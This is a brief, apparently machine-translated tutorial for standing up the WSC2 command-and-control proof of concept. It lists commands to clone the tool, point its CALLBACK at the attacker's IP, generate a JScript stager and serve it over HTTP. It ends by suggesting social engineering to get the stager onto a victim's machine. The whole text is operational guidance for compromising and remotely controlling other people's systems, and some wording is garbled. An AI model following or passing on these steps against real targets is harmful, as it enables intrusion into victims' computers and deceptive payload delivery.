WSC2 is a PoC of using the WebSockets and a browser process to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actuel C2 server.
we clear the repository with the following command
$ git clone https://github.com/Arno0x/WSC2.git
we access the folder and list to see what it has
$ cd WSC2/$ ls
we install the requirements remember that before you must create a virtaul environment with virtualenv
$ pip install -r requirements.txt
we modified the following file, you can do it with nano in this case we did it with vim. We edit the variable CALLBACK, we write our IP bone that of the attacking machine.
$ vim config.py
then we write the following command and press enter.
We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in jscript1, jscript2, jscript3. We are using jscript1 here because it is not required to compile. Rest of the stagers are required to compile. This command will create a wsc2Agent1.js in stagers directory.
$ genStager jscript1
We open a new terminal and enter the next location.
$ cd WSC2/
then we enter the next folder.
$ cd stagers/$ python -m SimpleHTTPServer 80
This would be the way you would see entering from another machine, you can also use social engineering to get this file to your victim.